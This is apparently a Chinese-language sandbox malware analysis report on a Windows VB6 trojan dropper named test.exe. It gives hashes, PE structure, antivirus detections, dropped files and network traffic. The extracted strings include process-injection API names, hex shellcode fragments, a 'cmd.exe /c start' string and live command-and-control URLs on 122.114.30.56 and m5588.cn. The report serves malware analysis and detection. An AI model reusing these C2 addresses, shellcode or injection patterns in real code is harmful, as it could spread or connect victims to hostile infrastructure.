恶意软件分析 & URL链接扫描免费在线病毒分析平台

分析任务

分析类型	虚拟机标签	开始时间	结束时间	持续时间
文件 (Windows)	win7-sp1-x64-shaapp01-1	2017-12-15 19:21:43	2017-12-15 19:24:00	137 秒

魔盾分数

10.0

Amvbfzlb病毒

文件详细信息

文件名	test.exe
文件大小	1388544 字节
文件类型	PE32 executable (GUI) Intel 80386, for MS Windows
MD5	8e14ddfbb97114a680aa43b1776efb49
SHA1	6c5ca6ddb5847463ca4e7ba01e49700050394688
SHA256	4d3e1c58cb911662c52300a2f212d02096b02616a68fb35da3c09e34c30b27ec
SHA512	76b5d6882d6295ac9bee10214753b5bbb5626b9b3083e434d4fef3375bc088a0556e63ac0558bdcc6ebe8e1dbd011d7ae2156f3c6e9372d23b07d302ee43678a
CRC32	6561A158
Ssdeep	24576:u0RCr0f4lZnHMvZxavQjJkmHiiEcwGDDepTT64cz:u0UhMhxDFhwGDSp/64cz
Yara	登录查看Yara规则
	样本下载提交误报

登录查看威胁特征

运行截图

访问主机纪录 (可点击查询WPING实时安全评级)

直接	IP	安全评级	地理位置
是	122.114.30.56	未知	中国

域名解析 (可点击查询WPING实时安全评级)

无域名信息.

摘要

登录查看详细行为信息

PE 信息

初始地址	0x00400000
入口地址	0x00401238
声明校验值	0x00159ec4
实际校验值	0x00159ec4
最低操作系统版本要求	4.0
编译时间	2017-12-10 22:38:24
载入哈希	d92864a8239cd2e8117fef53396d4c0c
图标
图标精确哈希值	8b67acc8289ad787f14ef265c8098b91
图标相似性哈希值	610ab0f829ac7b08395f2013f94801da

版本信息

Translation
InternalName
FileVersion
CompanyName
ProductName
ProductVersion
OriginalFilename

PE 数据组成

名称	虚拟地址	虚拟大小	原始数据大小	特征	熵(Entropy)
.text	0x00001000	0x00001588	0x00002000	IMAGE_SCN_CNT_CODE\|IMAGE_SCN_MEM_EXECUTE\|IMAGE_SCN_MEM_READ	4.09
.data	0x00003000	0x00000300	0x00001000	IMAGE_SCN_CNT_INITIALIZED_DATA\|IMAGE_SCN_MEM_READ\|IMAGE_SCN_MEM_WRITE	0.00
.rsrc	0x00004000	0x0014eb2c	0x0014f000	IMAGE_SCN_CNT_INITIALIZED_DATA\|IMAGE_SCN_MEM_READ	6.50

资源

名称	偏移量	大小	语言	子语言	熵(Entropy)	文件类型
CUSTOM	0x0000492c	0x0002b000	LANG_CHINESE	SUBLANG_CHINESE_SIMPLIFIED	5.55	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
CUSTOM	0x0000492c	0x0002b000	LANG_CHINESE	SUBLANG_CHINESE_SIMPLIFIED	5.55	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
RT_ICON	0x000043ec	0x00000128	LANG_NEUTRAL	SUBLANG_NEUTRAL	2.07	GLS_BINARY_LSB_FIRST
RT_ICON	0x000043ec	0x00000128	LANG_NEUTRAL	SUBLANG_NEUTRAL	2.07	GLS_BINARY_LSB_FIRST
RT_ICON	0x000043ec	0x00000128	LANG_NEUTRAL	SUBLANG_NEUTRAL	2.07	GLS_BINARY_LSB_FIRST
RT_GROUP_ICON	0x000043bc	0x00000030	LANG_NEUTRAL	SUBLANG_NEUTRAL	2.98	MS Windows icon resource - 3 icons, 32x32, 2 colors
RT_VERSION	0x000041d0	0x000001ec	LANG_CHINESE	SUBLANG_CHINESE_SIMPLIFIED	3.35	data

导入

库: MSVBVM60.DLL:

• 0x401000 _CIcos

• 0x401004 _adj_fptan

• 0x401008 __vbaAryMove

• 0x40100c __vbaFreeVar

• 0x401010 __vbaFreeVarList

• 0x401014 _adj_fdiv_m64

• 0x401018 _adj_fprem1

• 0x40101c __vbaStrCat

• 0x401020 __vbaSetSystemError

• 0x401024 __vbaHresultCheckObj

• 0x401028 _adj_fdiv_m32

• 0x40102c __vbaAryDestruct

• 0x401030 __vbaExitProc

• 0x401034 __vbaOnError

• 0x401038 __vbaObjSet

• 0x40103c None

• 0x401040 _adj_fdiv_m16i

• 0x401044 _adj_fdivr_m16i

• 0x401048 _CIsin

• 0x40104c __vbaChkstk

• 0x401050 __vbaFileClose

• 0x401054 None

• 0x401058 __vbaPutOwner3

• 0x40105c DllFunctionCall

• 0x401060 _adj_fpatan

• 0x401064 None

• 0x401068 _CIsqrt

• 0x40106c __vbaExceptHandler

• 0x401070 _adj_fprem

• 0x401074 _adj_fdivr_m64

• 0x401078 None

• 0x40107c __vbaFPException

• 0x401080 __vbaVarCat

• 0x401084 _CIlog

• 0x401088 __vbaFileOpen

• 0x40108c __vbaNew2

• 0x401090 __vbaVar2Vec

• 0x401094 _adj_fdiv_m32i

• 0x401098 _adj_fdivr_m32i

• 0x40109c _adj_fdivr_m32

• 0x4010a0 _adj_fdiv_r

• 0x4010a4 None

• 0x4010a8 None

• 0x4010ac __vbaFpI4

• 0x4010b0 _CIatan

• 0x4010b4 __vbaStrMove

• 0x4010b8 _allmul

• 0x4010bc None

• 0x4010c0 _CItan

• 0x4010c4 _CIexp

• 0x4010c8 __vbaFreeStr

• 0x4010cc __vbaFreeObj

.text
`.data
.rsrc
MSVBVM60.DLL
vb6chs.dll
Module1
kernel32
OpenProcess
WaitForSingleObject
CloseHandle
TerminateProcess
VBA6.DLL
__vbaAryDestruct
__vbaExitProc
__vbaFreeVarList
__vbaVarCat
__vbaObjSet
__vbaSetSystemError
__vbaFpI4
__vbaFileClose
__vbaPutOwner3
__vbaFileOpen
__vbaFreeVar
__vbaVar2Vec
__vbaStrMove
__vbaAryMove
__vbaFreeObj
__vbaFreeStr
__vbaHresultCheckObj
__vbaNew2
__vbaStrCat
__vbaOnError
MSVBVM60.DLL
_CIcos
_adj_fptan
__vbaAryMove
__vbaFreeVar
__vbaFreeVarList
_adj_fdiv_m64
_adj_fprem1
__vbaStrCat
__vbaSetSystemError
__vbaHresultCheckObj
_adj_fdiv_m32
__vbaAryDestruct
__vbaExitProc
__vbaOnError
__vbaObjSet
_adj_fdiv_m16i
_adj_fdivr_m16i
_CIsin
__vbaChkstk
__vbaFileClose
__vbaPutOwner3
DllFunctionCall
_adj_fpatan
_CIsqrt
__vbaExceptHandler
_adj_fprem
_adj_fdivr_m64
__vbaFPException
__vbaVarCat
_CIlog
__vbaFileOpen
__vbaNew2
__vbaVar2Vec
_adj_fdiv_m32i
_adj_fdivr_m32i
_adj_fdivr_m32
_adj_fdiv_r
__vbaFpI4
_CIatan
__vbaStrMove
_allmul
_CItan
_CIexp
__vbaFreeStr
__vbaFreeObj
.text
`.data
.rsrc
@.reloc
MSVBVM60.DLL
vb6chs.dll
leQHr)
ModDLL
Form1
clsASM
ModYH
ModDXC
Module1
AsmGetCpu
kernel32
GetModuleHandleA
CreateRemoteThread
GetModuleHandleW
SUB_ESI
GetCurrentThreadId
GetCurrentProcessId
GetCurrentThread
ResumeThread
user32
AttachThreadInput
SuspendThread
TerminateThread
Sleep
winmm.dll
timeGetTime
DebugBreak
QueueUserAPC
TerminateProcess
ExtractIconA
timeBeginPeriod
timeEndPeriod
OpenThread
FreeLibrary
WaitForSingleObject
SetWindowLongA
shell32.dll
SUB_EDX
FreeLibraryAndExitThread
InitializeCriticalSection
DeleteCriticalSection
EnterCriticalSection
LeaveCriticalSection
comctl32
InitCommonControls
ole32.dll
CoInitializeEx
msvbvm60.dll
VBDllGetClassObject
UserDllMain
CreateThread
GetAsyncKeyState
SUB_EBX_EAX
CoInitialize
CoUninitialize
CreateIExprSrvObj
ReadProcessMemory
ExitProcess
MessageBoxA
SUB_EBX
MessageBoxW
FindWindowA
PostMessageA
SetUnhandledExceptionFilter
RtlMoveMemory
VirtualQuery
GetModuleFileNameA
RaiseException
GetThreadContext
SetThreadContext
SUB_ECX
WriteProcessMemory
MsgWaitForMultipleObjects
oleaut32.dll
OleLoadPicturePath
VirtualFreeEx
CloseHandle
SUB_EAX_EDX
Wsock32.dll
htonl
LoadLibraryA
GetProcAddress
kernel32.dll
RtlZeroMemory
VirtualProtect
msvbvm60
EbLibraryUnload
CallWindowProcA
VirtualAllocEx
VBA6.DLL
EbShowToolTips
SendMessageA
PostThreadMessageA
GetMessageA
SUB_EAX
OpenProcess
GetLastError
CreateEventA
Na(uA
IClass
C:\windows\SysWow64\MSVBVM60.DLL\3
VBRUN
Run_ASM
Int2Hex
Leave
Pushad
Popad
IN_AL_DX
TEST_EAX_EAX
Add_EAX_EDX
Add_EBX_EAX
Add_EAX_DWORD_Ptr
Add_EBX_DWORD_Ptr
Add_EBP_DWORD_Ptr
Add_EAX
Add_EBX
Add_ECX
Add_EDX
Add_ESI
Add_ESP
SUB_ESP
Call_EAX
Call_EBX
Call_ECX
Call_EDX
Call_ESI
Call_ESP
Call_EBP
Call_EDI
Call_DWORD_Ptr
Call_DWORD_Ptr_EAX
Call_DWORD_Ptr_EBX
Cmp_EAX
Cmp_El
Cmp_EAX_EDX
Cmp_EAX_DWORD_Ptr
Cmp_DWORD_Ptr_EAX
Dec_EAX
Dec_EBX
Dec_ECX
Dec_EDX
Idiv_EAX
Idiv_EBX
Idiv_ECX
Idiv_EDX
Imul_EAX_EDX
Imul_EAX
ImulB_EAX
Inc_EAX
Inc_EBX
Inc_ECX
Inc_EDX
Inc_EDI
Inc_ESI
Inc_DWORD_Ptr_EAX
Inc_DWORD_Ptr_EBX
Inc_DWORD_Ptr_ECX
Inc_DWORD_Ptr_EDX
JMP_EAX
JMP_DWORD_Ptr_ESP
JNZ_Y
Mov_DWORD_Ptr_EAX
Mov_EAX
Mov_EBX
Mov_ECX
Mov_EDX
Mov_ESI
Mov_ESP
Mov_EBP
Mov_EDI
Mov_EBX_DWORD_Ptr
Mov_ECX_DWORD_Ptr
Mov_EAX_DWORD_Ptr
Mov_EDX_DWORD_Ptr
Mov_ESI_DWORD_Ptr
Mov_ESP_DWORD_Ptr
Mov_EBP_DWORD_Ptr
Mov_EAX_DWORD_Ptr_EAX
Mov_EAX_DWORD_Ptr_EBP
Mov_EAX_DWORD_Ptr_EBX
Mov_EAX_DWORD_Ptr_ECX
Mov_EAX_DWORD_Ptr_EDX
Mov_EAX_DWORD_Ptr_EDI
Mov_EAX_DWORD_Ptr_ESP
Mov_EAX_DWORD_Ptr_ESI
Mov_EAX_DWORD_Ptr_EAX_Add
Mov_EAX_DWORD_Ptr_ESP_Add
Mov_EAX_DWORD_Ptr_EBX_Add
Mov_EAX_DWORD_Ptr_ECX_Add
Mov_EAX_DWORD_Ptr_EDX_Add
Mov_EAX_DWORD_Ptr_EDI_Add
Mov_EAX_DWORD_Ptr_EBP_Add
Mov_EAX_DWORD_Ptr_ESI_Add
Mov_EBX_DWORD_Ptr_EAX_Add
Mov_ECX_DWORD_Ptr_EBX
Mov_EBX_DWORD_Ptr_ESP_Add
Mov_EBX_DWORD_Ptr_EBX_Add
Mov_EBX_DWORD_Ptr_ECX_Add
Mov_EBX_DWORD_Ptr_EDX_Add
Mov_EBX_DWORD_Ptr_EDI_Add
Mov_EBX_DWORD_Ptr_EBP_Add
Mov_EBX_DWORD_Ptr_ESI_Add
Mov_ECX_DWORD_Ptr_EAX_Add
Mov_ECX_DWORD_Ptr_ESP_Add
Mov_ECX_DWORD_Ptr_EBX_Add
Mov_ECX_DWORD_Ptr_ECX_Add
Mov_ECX_DWORD_Ptr_EDX_Add
Mov_ECX_DWORD_Ptr_EDI_Add
Mov_ECX_DWORD_Ptr_EBP_Add
Mov_ECX_DWORD_Ptr_ESI_Add
Mov_EDX_DWORD_Ptr_EAX_Add
Mov_EDX_DWORD_Ptr_ESP_Add
Mov_EDX_DWORD_Ptr_EBX_Add
Mov_EDX_DWORD_Ptr_ECX_Add
Mov_EDX_DWORD_Ptr_EDX_Add
Mov_EDX_DWORD_Ptr_EDI_Add
Mov_EDX_DWORD_Ptr_EBP_Add
Mov_EDX_DWORD_Ptr_ESI_Add
Mov_EBX_DWORD_Ptr_EAX
Mov_EBX_DWORD_Ptr_EBP
Mov_EBX_DWORD_Ptr_EBX
Mov_EBX_DWORD_Ptr_ECX
Mov_EBX_DWORD_Ptr_EDX
Mov_EBX_DWORD_Ptr_EDI
Mov_EBX_DWORD_Ptr_ESP
Mov_EBX_DWORD_Ptr_ESI
Mov_ECX_DWORD_Ptr_EAX
Mov_ECX_DWORD_Ptr_EBP
Mov_ECX_DWORD_Ptr_ECX
Mov_ECX_DWORD_Ptr_EDX
Mov_ECX_DWORD_Ptr_EDI
Mov_ECX_DWORD_Ptr_ESP
Mov_ECX_DWORD_Ptr_ESI
Mov_EDX_DWORD_Ptr_EAX
Mov_EDX_DWORD_Ptr_EBP
Mov_EDX_DWORD_Ptr_EBX
Mov_EDX_DWORD_Ptr_ECX
Mov_EDX_DWORD_Ptr_EDX
Mov_EDX_DWORD_Ptr_EDI
Mov_EDX_DWORD_Ptr_ESI
Mov_EDX_DWORD_Ptr_ESP
Mov_EAX_EBP
Mov_EAX_EBX
Mov_EAX_ECX
Mov_EAX_EDI
Mov_EAX_EDX
Mov_EAX_ESI
Mov_EAX_ESP
Mov_EBX_EBP
Mov_EBX_EAX
Mov_EBX_ECX
Mov_EBX_EDI
Mov_EBX_EDX
Mov_EBX_ESI
Mov_EBX_ESP
Mov_ECX_EBP
Mov_ECX_EAX
Mov_ECX_EBX
Mov_ECX_EDI
Mov_ECX_EDX
Mov_ECX_ESI
Mov_ECX_ESP
Mov_EDX_EBP
Mov_EDX_EBX
Mov_EDX_ECX
Mov_EDX_EDI
Mov_EDX_EAX
Mov_EDX_ESI
Mov_EDX_ESP
Mov_ESI_EBP
Mov_ESI_EBX
Mov_ESI_ECX
Mov_ESI_EDI
Mov_ESI_EAX
Mov_ESI_EDX
Mov_ESI_ESP
Mov_ESP_EBP
Mov_ESP_EBX
Mov_ESP_ECX
Mov_ESP_EDI
Mov_ESP_EAX
Mov_ESP_EDX
Mov_ESP_ESI
Mov_EDI_EBP
Mov_EDI_EAX
Mov_EDI_EBX
Mov_EDI_ECX
Mov_EDI_EDX
Mov_EDI_ESI
Mov_EDI_ESP
Mov_EBP_EDI
Mov_EBP_EAX
Mov_EBP_EBX
Mov_EBP_ECX
Mov_EBP_EDX
Mov_EBP_ESI
Mov_EBP_ESP
Mov_EDI_EDI
Push_DWORD_Ptr
Push_EAX
Push_ECX
Push_EDX
Push_EBX
Push_ESP
Push_EBP
Push_ESI
Push_EDI
Lea_EAX_DWORD_Ptr_EAX_Add
Lea_EAX_DWORD_Ptr_EBX_Add
Lea_EAX_DWORD_Ptr_ECX_Add
Lea_EAX_DWORD_Ptr_EDX_Add
Lea_EAX_DWORD_Ptr_ESI_Add
Lea_EAX_DWORD_Ptr_ESP_Add
Lea_EAX_DWORD_Ptr_EBP_Add
Lea_EAX_DWORD_Ptr_EDI_Add
Lea_EBX_DWORD_Ptr_EAX_Add
Lea_EBX_DWORD_Ptr_ESP_Add
Lea_EBX_DWORD_Ptr_EBX_Add
Lea_EBX_DWORD_Ptr_ECX_Add
Lea_EBX_DWORD_Ptr_EDX_Add
Lea_EBX_DWORD_Ptr_EDI_Add
Lea_EBX_DWORD_Ptr_EBP_Add
Lea_EBX_DWORD_Ptr_ESI_Add
Lea_ECX_DWORD_Ptr_EAX_Add
Lea_ECX_DWORD_Ptr_ESP_Add
Lea_ECX_DWORD_Ptr_EBX_Add
Lea_ECX_DWORD_Ptr_ECX_Add
Lea_ECX_DWORD_Ptr_EDX_Add
Lea_ECX_DWORD_Ptr_EDI_Add
Lea_ECX_DWORD_Ptr_EBP_Add
Lea_ECX_DWORD_Ptr_ESI_Add
Lea_EDX_DWORD_Ptr_EAX_Add
Lea_EDX_DWORD_Ptr_ESP_Add
Lea_EDX_DWORD_Ptr_EBX_Add
Lea_EDX_DWORD_Ptr_ECX_Add
Lea_EDX_DWORD_Ptr_EDX_Add
Lea_EDX_DWORD_Ptr_EDI_Add
Lea_EDX_DWORD_Ptr_EBP_Add
Lea_EDX_DWORD_Ptr_ESI_Add
Pop_EAX
Pop_EBX
Pop_ECX
Pop_EDX
Pop_ESI
Pop_ESP
Pop_EDI
Pop_EBP
!jWW?
VBA6.DLL
__vbaVarDup
Label1
__vbaObjSetAddref
__vbaAryDestruct
__vbaStrVarCopy
__vbaInStrB
__vbaFreeVarList
__vbaStrVarMove
__vbaAryConstruct2
__vbaFreeVar
__vbaStrCat
__vbaStrMove
Command1
__vbaFreeStr
__vbaStrCopy
__vbaFreeStrList
__vbaStrToAnsi
__vbaFreeObj
__vbaHresultCheckObj
__vbaNew2
__vbaSetSystemError
NagS_MRC
__vbaVarCat
v|T$U
__vbaStrToUnicode
__vbaStrI4
Label2
__vbaLsetFixstrFree
__vbaFixstrConstruct
C:\Program Files (x86)\Microsoft Visual Studio\VB98\VB6.OLB
List1
Picture1
Picture2
Timer1
SetWindowTextA
SetParent
MoveWindow
GetWindowRect
FindWindowExA
GetWindow
GetWindowTextA
GetClassNameA
SetCapture
ReleaseCapture
ShowWindow
__vbaFreeObjList
__vbaObjSet
__vbaVarTstEq
__vbaVarCopy
__vbaVarVargNofree
__vbaVarAdd
__vbaAryUnlock
__vbaAryLock
__vbaI4Str
__vbaR8Str
__vbaUI1ErrVar
__vbaUbound
__vbaLenBstr
__vbaFpI4
__vbaRedim
__vbaObjVar
__vbaVarSetObjAddref
__vbaVarLateMemCallLd
__vbaVarMove
__vbaVargVar
__vbaLateMemCall
__vbaVarLateMemSt
__vbaVarSetVar
__vbaExitProc
__vbaStrVarVal
__vbaVarTstNe
__vbaI4Var
__vbaCastObjVar
__vbaOnError
__vbaCastObj
__vbaVar2Vec
__vbaAryMove
__vbaAryVar
__vbaAryCopy
__vbaVarIndexLoad
__vbaFpUI1
__vbaRefVarAry
__vbaBoolVar
GlobalAlloc
__vbaStrCmp
__vbaVarMul
__vbaVarInt
__vbaUI1Var
__vbaVarForNext
__vbaVarForInit
Form1
Form1
Timer1
Picture2
Label2
Label2
List1
Picture1
Line1
Line1
Line1
Label1
Label1
Label1
Label1
Command1
Command1
Value
Ph4e@
PhHe@
Ph,`@
9=XKB
Rh(@B
Qh||@
RhL{@
Qh(}@
Rhd}@
Ph(~@
4Phxd@
1.vbp
CUSTOM
\123.exe
CUSTOM
VS_VERSION_INFO
VarFileInfo
Translation
StringFileInfo
080404B0
CompanyName
ProductName
FileVersion
ProductVersion
InternalName
OriginalFilename
1.exe
).vbp
 64A1300000008B400C8B400C8B5818 3B5C24 04 90 7505 8B40 28 EB048B00 EBED C2 04 00
User32.dll
MessageBoxW
kernel32
FreeLibrary
shell32.dll
ExtractIconW
write
cmd.exe /c start 
TForm1
0000000
0FAFC2
FF2424
8B4500
8B0424
8B4424
8B8424
8B5C24
8B9C24
8B4C24
8B8C24
8B5424
8B9424
8B5D00
8B1C24
8B4D00
8B0C24
8B5500
8B1424
8D4424
8D8424
8D5C24
8D9C24
8D4C24
8D8C24
8D5424
8D9424
WinHttp.WinHttpRequest.5.1
Cookie
Connection
keep-alive
Accept
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
User-Agent
Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.89 Safari/537.36
Accept-Language
zh-CN,zh;q=0.8
GB2312
Adodb.Stream
Write
Position
Charset
ReadText
Close
GetCurrentThreadId
60 68
FFD0 59 3BC8 75 0D 61 8BFF 55 8BEC B9
OLE32
CoGetClassObject
FFD1 83F8 01 74 E7
FFD1 83F8 00 75 07 83EC 18 C2 1400 90 90 90 90 90 90 90 90 90 90 90
Microsoft.XMLHTTP
8B4424 04 B9 00000000 83F9 18 74 08 FF3408 83C1 04 EB F3 58 FFD0 C2 0400
60 8B4424 64 3B4424 70 75 05 B8 01000000 5F 5E 5D 5C C3
 60 68 
ReadyState
FFD0 8B4424 24 FF30 8B48 04 51 8B70 10 8D78 14 83FE 00 74 08 83EE 04 FF343E  EB F3 83F9 00 74 07 C741 08 02000000 FF70 10 90 90 90 90 
 59 FF540C 04 
VirtualFreeEx
FFD0  83C4 08 61 C2 0400
833C24 00 74 0D 8B3C24 8947 0C 837F 10 01 74 23 90 68 00800000 6A 00 FF7424 28 6A FF B8
FFD0 B8
ole32.dll
CoUninitialize
FFD0 83C4 08  61 C2 0400 
user32
PostMessageA
57 6A 02 68 0000 0000 FF35 0000 0000 B8
ResponseBody
http://122.114.30.56:5/sb/list.txt
http://122.114.30.56:5/sb/id.asp
http://m5588.cn:5/m/sb/list.txt
http://m5588.cn:5/m/sb/id.asp
541*1206
TTabSheet
TPageControl
B80000000033D20FA28915
B80100000033C933D20FA28915
00000000000000000000000000000000

防病毒引擎/厂商	病毒名/规则匹配	病毒库日期
Bkav	未发现病毒	20171214
MicroWorld-eScan	Gen:Trojan.Heur.Dropper.un0@amVbFZlb	20171215
nProtect	未发现病毒	20171215
CMC	未发现病毒	20171215
CAT-QuickHeal	未发现病毒	20171215
McAfee	Artemis!8E14DDFBB971	20171215
Cylance	Unsafe	20171215
Zillya	未发现病毒	20171214
SUPERAntiSpyware	未发现病毒	20171215
TheHacker	未发现病毒	20171210
K7GW	Trojan ( 003d23081 )	20171214
K7AntiVirus	Trojan ( 003d23081 )	20171215
Arcabit	Trojan.Heur.Dropper.EA6E9A	20171215
TrendMicro	未发现病毒	20171215
Baidu	Win32.Trojan.WisdomEyes.16070401.9500.9989	20171215
Cyren	W32/GenBl.8E14DDFB!Olympus	20171215
Symantec	未发现病毒	20171215
ESET-NOD32	未发现病毒	20171215
Paloalto	generic.ml	20171215
ClamAV	未发现病毒	20171215
Kaspersky	未发现病毒	20171215
BitDefender	Gen:Trojan.Heur.Dropper.un0@amVbFZlb	20171215
NANO-Antivirus	Virus.Win32.Gen.ccmw	20171215
AegisLab	Gen.Troj.Heur!c	20171215
Rising	未发现病毒	20171215
Ad-Aware	Gen:Trojan.Heur.Dropper.un0@amVbFZlb	20171215
Emsisoft	Gen:Trojan.Heur.Dropper.un0@amVbFZlb (B)	20171215
Comodo	未发现病毒	20171215
F-Secure	Gen:Trojan.Heur.Dropper.un0@amVbFZlb	20171215
DrWeb	Trojan.KillFiles.29194	20171215
VIPRE	Trojan.Win32.Generic!BT	20171215
Invincea	heuristic	20170914
McAfee-GW-Edition	BehavesLike.Win32.Rontokbro.th	20171215
Sophos	未发现病毒	20171215
Ikarus	Backdoor.Win32.Hupigon	20171214
F-Prot	未发现病毒	20171215
Jiangmin	未发现病毒	20171215
Webroot	未发现病毒	20171215
Avira	TR/Dropper.Gen	20171215
Antiy-AVL	未发现病毒	20171215
Kingsoft	未发现病毒	20171215
Microsoft	未发现病毒	20171214
Endgame	malicious (high confidence)	20171130
ViRobot	未发现病毒	20171215
ZoneAlarm	未发现病毒	20171215
Avast-Mobile	未发现病毒	20171215
GData	Gen:Trojan.Heur.Dropper.un0@amVbFZlb	20171215
AhnLab-V3	未发现病毒	20171215
ALYac	未发现病毒	20171215
AVware	Trojan.Win32.Generic!BT	20171215
MAX	malware (ai score=88)	20171215
VBA32	未发现病毒	20171214
Malwarebytes	未发现病毒	20171215
WhiteArmor	未发现病毒	20171204
Panda	未发现病毒	20171214
Zoner	未发现病毒	20171215
Tencent	Win32.Trojan.Dropper.Ebgu	20171215
Yandex	未发现病毒	20171214
SentinelOne	未发现病毒	20171207
eGambit	未发现病毒	20171215
Fortinet	未发现病毒	20171215
AVG	FileRepMalware	20171215
Cybereason	malicious.1b8fb7	20171103
Avast	FileRepMalware	20171215
CrowdStrike	malicious_confidence_100% (W)	20171016
Qihoo-360	未发现病毒	20171215

进程树

test.exe id: 2032
- 123.exe id: 272

test.exe, PID: 2032, 上一级进程 PID: 300

缺省注册表文件系统网络进程线程服务设备同步加密浏览器全部

123.exe, PID: 272, 上一级进程 PID: 2032

缺省注册表文件系统网络进程线程服务设备同步加密浏览器全部

下载PCAP包

访问主机纪录 (可点击查询WPING实时安全评级)

直接	IP	安全评级	地理位置
是	122.114.30.56	未知	中国

TCP

源地址	源端口	目标地址	目标端口
192.168.122.201	49162	122.114.30.56	5

UDP

无UDP连接纪录.

域名解析 (可点击查询WPING实时安全评级)

无域名信息.

TCP

源地址	源端口	目标地址	目标端口
192.168.122.201	49162	122.114.30.56	5

UDP

无UDP连接纪录.

HTTP 请求

URI	HTTP数据
URL专业沙箱检测 -> http://122.114.30.56:5/sb/list.txt	GET /sb/list.txt HTTP/1.1 Connection: Keep-Alive Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/;q=0.8 Accept-Language: zh-CN,zh;q=0.8 User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.89 Safari/537.36 Host: 122.114.30.56:5
URL专业沙箱检测 -> http://122.114.30.56:5/sb/id.asp?id=49656E690000000D0F8BFBFF1FBA2223	GET /sb/id.asp?id=49656E690000000D0F8BFBFF1FBA2223 HTTP/1.1 Connection: Keep-Alive Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/;q=0.8 Accept-Language: zh-CN,zh;q=0.8 User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.89 Safari/537.36 Host: 122.114.30.56:5

URI

HTTP数据

URL专业沙箱检测 -> http://122.114.30.56:5/sb/list.txt

GET /sb/list.txt HTTP/1.1
Connection: Keep-Alive
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.89 Safari/537.36
Host: 122.114.30.56:5

URL专业沙箱检测 -> http://122.114.30.56:5/sb/id.asp?id=49656E690000000D0F8BFBFF1FBA2223

GET /sb/id.asp?id=49656E690000000D0F8BFBFF1FBA2223 HTTP/1.1
Connection: Keep-Alive
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.89 Safari/537.36
Host: 122.114.30.56:5

SMTP 流量

无SMTP流量.

IRC 流量

无IRC请求.

ICMP 流量

无ICMP流量.

CIF 报告

无 CIF 结果

网络警报

无警报

TLS

No TLS

Suricata HTTP

No Suricata HTTP

未发现网络提取文件

文件名	\xe8\x90\xbd\xe5\x8f\xb6\xe7\x9a\x84\xe5\xbf\xa7\xe4\xbc\xa4.dll
相关文件	C:\Users\test\AppData\Local\Temp\\xe8\x90\xbd\xe5\x8f\xb6\xe7\x9a\x84\xe5\xbf\xa7\xe4\xbc\xa4.dll
文件大小	176128 字节
文件类型	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
MD5	a1572aa30ca960c26086fa33ce805cd6
SHA1	407c7d69695189cdccd9c302aab193dbbdb40f2b
SHA256	59b73c07a60734ffddbfd99d56d238a4c389bb01ad87c69c76e9ca4d83c6872d
CRC32	937E4EA9
Ssdeep	1536:dtbFuRksd2wNfydHTG+00t+rm54oPQ4PygTGDIcADX0IEZ/HtkwAOCsXU+U0WwRe:LbFuOsdFWp0Z7AL0IcPtV7CsXSuRj
	下载提交魔盾安全分析

文件名	123.exe
相关文件	C:\Users\test\AppData\Local\Temp\123.exe
文件大小	1192448 字节
文件类型	PE32 executable (GUI) Intel 80386, for MS Windows
MD5	8cd1a5bfe4b1ff66f492a4e486cec9a8
SHA1	890208385b4baecb8fd61bdf9c401dd06d8b1345
SHA256	eca67026be257fa1c5fc8ee1ca34d8913f51cb81a175d56ec9608764a6379397
CRC32	348C870B
Ssdeep	24576:E0f4lZnHMvZxavQjJkmHiiEcwGDDepTT64cz:EhMhxDFhwGDSp/64cz
	下载提交魔盾安全分析

没有发现相似的分析.

HTML 总结报告 (需15-60分钟同步)	下载

Processing ( 25.746 seconds )

10.419 NetworkAnalysis
8.553 Suricata
1.969 TargetInfo
1.662 Static
1.417 BehaviorAnalysis
1.234 VirusTotal
0.398 peid
0.064 Dropped
0.011 Strings
0.01 AnalysisInfo
0.004 Debug
0.003 config_decoder
0.002 Memory

Signatures ( 1.801 seconds )

1.389 md_url_bl
0.086 stealth_timeout
0.083 api_spamming
0.054 decoy_document
0.043 antidbg_windows
0.026 antiav_detectreg
0.01 infostealer_ftp
0.008 antivm_vbox_window
0.006 persistence_autorun
0.006 antiav_detectfile
0.006 infostealer_im
0.006 md_bad_drop
0.005 antiemu_wine_func
0.005 antisandbox_script_timer
0.005 antianalysis_detectreg
0.005 geodo_banking_trojan
0.005 md_domain_bl
0.004 kovter_behavior
0.004 infostealer_bitcoin
0.004 infostealer_mail
0.004 ransomware_files
0.003 infostealer_browser_password
0.003 antivm_vbox_files
0.003 disables_browser_warn
0.003 ransomware_extensions
0.002 rat_nanocore
0.002 tinba_behavior
0.002 browser_security
0.001 antivm_generic_services
0.001 betabot_behavior
0.001 antivm_vbox_libs
0.001 kibex_behavior
0.001 antivm_generic_scsi
0.001 shifu_behavior
0.001 antivm_generic_disk
0.001 ursnif_behavior
0.001 cerber_behavior
0.001 antivm_generic_diskreg
0.001 antivm_parallels_keys
0.001 antivm_xen_keys
0.001 banker_zeus_mutex
0.001 bot_drive
0.001 bot_drive2
0.001 browser_addon
0.001 modify_proxy
0.001 darkcomet_regkeys
0.001 network_http

Reporting ( 0.674 seconds )

0.594 ReportHTMLSummary
0.08 Malheur


Task ID	122632
Mongo ID	5a33b0eebb7d5720df12a1d5
Cuckoo release	1.4-Maldun